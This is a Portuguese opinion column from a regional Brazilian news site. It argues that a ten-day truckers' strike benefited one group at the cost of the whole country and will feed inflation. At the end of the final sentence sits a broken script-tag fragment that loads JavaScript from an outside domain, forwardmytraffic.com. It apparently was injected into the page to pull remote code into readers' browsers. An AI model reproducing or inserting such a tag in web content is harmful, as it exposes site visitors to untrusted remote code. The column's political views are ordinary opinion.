InícioUncategorizedUMA CATEGORIA BENEFICIADA EM DETRIMENTO DE TODO O PAÍS

UMA CATEGORIA BENEFICIADA EM DETRIMENTO DE TODO O PAÍS

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

A greve dos caminhoneiros aparentemente está terminando (até que enfim), depois de 10 dias as rodovias começam a ser liberadas.

 

 

No início, mesmo com certa relutância, apoiei, acreditando que após as negociações, as coisas melhorariam, mas a paralisação seguiu mesmo após os acordos.

 

 

O governo, sem credibilidade e fragilizado cedeu até onde pode e a paralisação continuou.

 

 

No fim das contas, não consegui mais apoiar, pois a cada dia de greve o prejuízo aumentou exponencialmente.

 

 

Muitas pessoas chamaram de egoísta quem estava enfrentando filas para abastecer seus veículos a preços absurdos, mas sabem por que estavam fazendo isso? Porque eles precisavam, ninguém sabe as necessidades do próximo, porém, foram duramente criticados, julgados menos patriotas e piores seres humanos que os que não precisavam de combustível.

 

 

Será que os grevistas não são egoístas também? Afinal, o diesel vai baixar, os pedágios vão baixar, o valor dos fretes será tabelado, tudo em benefício de uma categoria, mas por acaso eles pensaram no impacto na vida das outras pessoas, na destruição de riqueza? Leite jogado fora, animais morrendo de fome, fábricas parando de produzir, comércio sem movimento, repartições públicas fechadas, escolas sem aula, etc.

 

 

A greve foi bonitinha no começo, depois perdeu o sentido, se tornou política e os apoiadores não perceberam que estavam sendo manipulados.

 

 

O custo das paralisações logo chegará até nós com a inflação, tudo irá subir, não importa a tabela feita pelo PROCON, os lojistas não podem vender produtos com preços menores que o custo. A redução no valor do diesel dificilmente impactará no valor dos outros produtos que chegam ao consumidor, pois o valor do frete não será reduzido.

 

 

Em suma, essa greve foi como matar um mosquito com uma bomba atômica, você até mata, mas destrói tudo ao redor…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.